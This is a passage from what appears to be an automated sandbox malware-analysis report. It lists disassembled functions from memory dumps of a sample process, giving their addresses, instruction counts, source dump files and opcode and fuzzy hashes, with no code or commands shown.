                                                          • Instruction ID: 5a40c54b5f5e0994f6c75d7aade7c672ba665f892aac9439aa7dda41154dd6b1
                                                          • Opcode Fuzzy Hash: f6fb6f9f4eb829699798d1a147556db533cdc96f4f8024b095f56f17ab236670
                                                          • Instruction Fuzzy Hash: 53A13CB5A00606DFCB48DF68D484A9EBBF6FF88310F158559E809AB361DB30ED41CB90
                                                          Function 06C111A8 Relevance: .2, Instructions: 210COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.2446560105.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_6c10000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e79d9c4cdd317b62262ed63359b941e0381f2ece520af7e4bd68b92df5bdbf3a
                                                          • Instruction ID: 6d0ca9c651d1367cec08b28cedda9f83551ae48f55516c1970a729ff9f6b4fde
                                                          • Opcode Fuzzy Hash: e79d9c4cdd317b62262ed63359b941e0381f2ece520af7e4bd68b92df5bdbf3a
                                                          • Instruction Fuzzy Hash: 06613631B00305CFCB549B79D84456ABBA5EFC7220B28817FDA05CFA15EB35DA42D7A1
                                                          Function 075EDD68 Relevance: .2, Instructions: 201COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.2449422051.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_75e0000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1bc4211a512597069e7a6cfc270d1370d51a592b104a6bca5068124f70ea6e95
                                                          • Instruction ID: 2775a8b5661091f5dc3c5503c60ceb4fea35749391666e4e9a1f15a22ea21a16
                                                          • Opcode Fuzzy Hash: 1bc4211a512597069e7a6cfc270d1370d51a592b104a6bca5068124f70ea6e95
                                                          • Instruction Fuzzy Hash: 0E817DB0700746CFCB28DF28D544AAABBF6FF84300F148A2ED91687655DB74E946CB91
                                                          Function 075EDB78 Relevance: .2, Instructions: 169COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.2449422051.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_75e0000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6c63126189abd73d50f7a23494f778afbd4011b42ed8e08b1e5bccf922b2fec1
                                                          • Instruction ID: 3d17d12e70cc7a05465f2bfa00cf9dd442d170ed94484d7eaadef7208dfec23b
                                                          • Opcode Fuzzy Hash: 6c63126189abd73d50f7a23494f778afbd4011b42ed8e08b1e5bccf922b2fec1
                                                          • Instruction Fuzzy Hash: B061D4B5A003598FDB54CFA9D880ADEBBF6FF88350F10446AE919EB314D7759841CB90
                                                          Function 075EDD67 Relevance: .2, Instructions: 159COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.2449422051.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_75e0000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 34038fb12b0921fca31e39ace1b296dda196410679e0a0b506a26f38082e4430
                                                          • Instruction ID: 53561e6ae480263c1f796e08660987225971faf9c1f2f990488db8742504310b
                                                          • Opcode Fuzzy Hash: 34038fb12b0921fca31e39ace1b296dda196410679e0a0b506a26f38082e4430
                                                          • Instruction Fuzzy Hash: E8516AB0700306CFCB28DF28D544AAABBF6FF84310F10852EE91597655DB74E946CB91
                                                          Function 075EDB69 Relevance: .2, Instructions: 155COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.2449422051.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_75e0000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 93159a8db158dc7dc50edd62367550441e1ae2d1e35e5da65428f83314194ba8
                                                          • Instruction ID: 73234df6c14ea7370db4589212754987be5975076358d8f7541a7ea6982978e4
                                                          • Opcode Fuzzy Hash: 93159a8db158dc7dc50edd62367550441e1ae2d1e35e5da65428f83314194ba8
                                                          • Instruction Fuzzy Hash: 175105B4A003598FCB54DFA9D880ADEBBF6FF88350F10446AE909EB314E7719841CB90
                                                          Function 075EC9D0 Relevance: .1, Instructions: 142COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.2449422051.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_75e0000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: df73c4fb9034119b8132716203623d7f80073e158edb71ae27927eb9e2ff942f
                                                          • Instruction ID: 7c73c2c012c400babbbfc6391fadf7efc5463c6878009f35658542ec4cda0bbb
                                                          • Opcode Fuzzy Hash: df73c4fb9034119b8132716203623d7f80073e158edb71ae27927eb9e2ff942f
                                                          • Instruction Fuzzy Hash: E041C0B23147029FD7388A7988007ABB7EEBF86250F544E5AD983D7680DF25EC418771
                                                          Function 0186D054 Relevance: .1, Instructions: 77COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.2425259151.000000000186D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0186D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_186d000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ea52f096994a9af1099962ba32b08f8da536755a9d65855b08174bd6fb6dd437
                                                          • Instruction ID: 4b297a32bf78e0a7a0b39ea12e3ac3190facfb8e5da10dfc34a7673e66b0fede
                                                          • Opcode Fuzzy Hash: ea52f096994a9af1099962ba32b08f8da536755a9d65855b08174bd6fb6dd437
                                                          • Instruction Fuzzy Hash: 5D213872604244EFCF15DF54D9C0B26BF69FB88314F24C258EA498B256C376D516CBA2
                                                          Function 0187D2C4 Relevance: .1, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.2425322097.000000000187D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0187D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_187d000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6b3d37dbbbaa97f16ed2954d8270f2d3905257a018bf9069072baf842709fdec
                                                          • Instruction ID: 08373442f03f9e2f4ca587a595e98bcb71b7480876d5ab41903fdfdd694ed225
                                                          • Opcode Fuzzy Hash: 6b3d37dbbbaa97f16ed2954d8270f2d3905257a018bf9069072baf842709fdec
                                                          • Instruction Fuzzy Hash: E22165B2104204EFDB05DF54D9C0B2ABB65FF84328F24C66DD8098B252C37AD506CAA1
                                                          Function 0187D474 Relevance: .1, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.2425322097.000000000187D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0187D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_187d000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6a77ccbbb74d9fe8e00dd830b8bb23106d7f893367698d9d19e0d2a2e736e21e
                                                          • Instruction ID: adda708345cc37aa40e1f04d405de23376ea41f328b0d4adf352b557d588f738
                                                          • Opcode Fuzzy Hash: 6a77ccbbb74d9fe8e00dd830b8bb23106d7f893367698d9d19e0d2a2e736e21e
                                                          • Instruction Fuzzy Hash: BE214971504204EFDB05DF94C5C0B26BB61FF88318F24C66DE9098B252C77BE546CA62
                                                          Function 075EDFD8 Relevance: .1, Instructions: 71COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.2449422051.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_75e0000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0efe3e308e8e29e899d5f1c84ca0d2d896601b5a9c9dcba11ded3f32d86f6bd5
                                                          • Instruction ID: 0b1b5473e5521f0ee4d85b70bcc03671de37c34d7b3c106d84c519892cd8e18a
                                                          • Opcode Fuzzy Hash: 0efe3e308e8e29e899d5f1c84ca0d2d896601b5a9c9dcba11ded3f32d86f6bd5
                                                          • Instruction Fuzzy Hash: E511B2B371825A9FE718DA69E8416EAB7D9FBC8370B148137E504C7540EA35A411C7A4
                                                          Function 075EC330 Relevance: .1, Instructions: 65COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.2449422051.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_75e0000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 79595ae99299a735d087ba02f424bf6beb8425fb06e3b428128ace2cedc2afb7
                                                          • Instruction ID: 448707ea4dbdb7cb6efc9a5d2223bdbe5bbf8123ed7507d5f5e72ac793bd6686
                                                          • Opcode Fuzzy Hash: 79595ae99299a735d087ba02f424bf6beb8425fb06e3b428128ace2cedc2afb7
                                                          • Instruction Fuzzy Hash: 55218E75A00289AFDB15CFE4C845ADEBBB5FF48310F04809AE910AB389C731D855CB50
                                                          Function 075EED69 Relevance: .1, Instructions: 61COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.2449422051.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_75e0000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 944268fce5f314fdd4042cd2290271df74b67cbd7f65b7b85fb9a6cce7a07c17
                                                          • Instruction ID: dd9eaec6953b9853c7d2f54874b31339fc32664beb80a6fe8f78a2a62e65b2d9
                                                          • Opcode Fuzzy Hash: 944268fce5f314fdd4042cd2290271df74b67cbd7f65b7b85fb9a6cce7a07c17
                                                          • Instruction Fuzzy Hash: 5E11E072300214EFD7198F64DD84BEA7BBAFF85320F14855AFA099B292CA31DD01CB60
                                                          Function 075EC928 Relevance: .1, Instructions: 61COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.2449422051.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_75e0000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7d5251970013ba70d8fac3cd746e96779b12abf8ed97e34393c7a1d4ba4ebd84
                                                          • Instruction ID: f56be9b9cc9c2f9dd777f4873a91dd044064b4a971bb8443f52e3390e7754cf9
                                                          • Opcode Fuzzy Hash: 7d5251970013ba70d8fac3cd746e96779b12abf8ed97e34393c7a1d4ba4ebd84
                                                          • Instruction Fuzzy Hash: AB1142712047068FD725DF29E8409DBBFE5EF85350700872EE5498BA21EB71F9498BE1
                                                          Function 0186D04F Relevance: .1, Instructions: 58COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.2425259151.000000000186D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0186D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_186d000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 83fb694dd1e91a6ea135483331fab76a04ef60c4faa8ae053019808facf22284
                                                          • Instruction ID: 446a0473d7ea324e3e896ea9e33c58cedc917cd15597b6c170815978c3b3f41e
                                                          • Opcode Fuzzy Hash: 83fb694dd1e91a6ea135483331fab76a04ef60c4faa8ae053019808facf22284
                                                          • Instruction Fuzzy Hash: E221CD76504680DFCB06CF44D9C0B16BF72FB88314F2482A9D9484A257C33AD526CBA1
                                                          Function 075EED78 Relevance: .1, Instructions: 57COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.2449422051.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_75e0000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 700999af372d077b4e7072cf792a250667f05f474e0338a9d08a4b22f40a0225
                                                          • Instruction ID: 6be329ae3f4ee371b762992fc2bfff810a647ce305cd3adedcc44ce8502b0bee
                                                          • Opcode Fuzzy Hash: 700999af372d077b4e7072cf792a250667f05f474e0338a9d08a4b22f40a0225
                                                          • Instruction Fuzzy Hash: C911A575700215EFE7588E65DC45BAA7BEAFB84320F148429F9098B291CB71ED01C750
                                                          Function 0187D46F Relevance: .1, Instructions: 53COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.2425322097.000000000187D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0187D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_187d000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                          • Instruction ID: 655b449e9f06e6c6bac742091c40a0ef21c76660ca414b663daede955ec7889d
                                                          • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                          • Instruction Fuzzy Hash: 1411BBB5504280CFCB02CF54C5C0B15BFA1FB88318F28C6AAE8498B257C33AD54ACB62
                                                          Function 0187D2BF Relevance: .1, Instructions: 53COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.2425322097.000000000187D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0187D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_187d000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ecf76333c4857edb0cae155a2ed822a1bfe38db2c40391184a4fb299c42cee64
                                                          • Instruction ID: ff25457dae29f63c5396f1bc1bffd2dcef52c50acb2346c5f3d5d0dc8bdbafe3
                                                          • Opcode Fuzzy Hash: ecf76333c4857edb0cae155a2ed822a1bfe38db2c40391184a4fb299c42cee64
                                                          • Instruction Fuzzy Hash: 1011BF76504684CFDB12CF14D5C4B19FF61FB84324F28C6AAD8498B656C33AD54ACBA2
                                                          Function 075EC938 Relevance: .0, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.2449422051.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_75e0000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6b448ce6670ab171a3c45642fa60cf263af3c5262234a0cc22f38b1d5e671c21
                                                          • Instruction ID: 2f2d6c5727b69c7d3eac52f72d18e9157c5d89206d1a465f23003af643d3b2a6
                                                          • Opcode Fuzzy Hash: 6b448ce6670ab171a3c45642fa60cf263af3c5262234a0cc22f38b1d5e671c21
                                                          • Instruction Fuzzy Hash: 8601D2712007068FD725DF29D84094BBBE5FF843507009A2DE54A97665EB70FD098B91
                                                          Function 0186DA95 Relevance: .0, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.2425259151.000000000186D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0186D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_186d000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2dd67fcd9ba0e1a46129c88ae6c9a62d887fd5bcc52506007eb14ae6c5348b4d
                                                          • Instruction ID: 15a88edeccbabca0b02d1430e5183a119286bc9b70931f1afa825082ca6bb85e
                                                          • Opcode Fuzzy Hash: 2dd67fcd9ba0e1a46129c88ae6c9a62d887fd5bcc52506007eb14ae6c5348b4d
                                                          • Instruction Fuzzy Hash: 13012B7160C3449AF7104F99CDC0B6BBFDCEF41325F08C65AEE898A182C7B89941C671
                                                          Function 0186DA94 Relevance: .0, Instructions: 36COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000011.00000002.2425259151.000000000186D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0186D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_17_2_186d000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a48cfba52801e6d7fccf1f121ca70d3d7dda202d982410d61d01397e29e3a682
                                                          • Instruction ID: 358c8ba415f54626f52c438d7529a9689b2f5f4e33c51f3f0fc4a62c2cdb5974
                                                          • Opcode Fuzzy Hash: a48cfba52801e6d7fccf1f121ca70d3d7dda202d982410d61d01397e29e3a682
                                                          • Instruction Fuzzy Hash: A9F0C2725093449EE7108E09C9C4B66FFDCEB81724F18C55AED484A286C3B89840CA71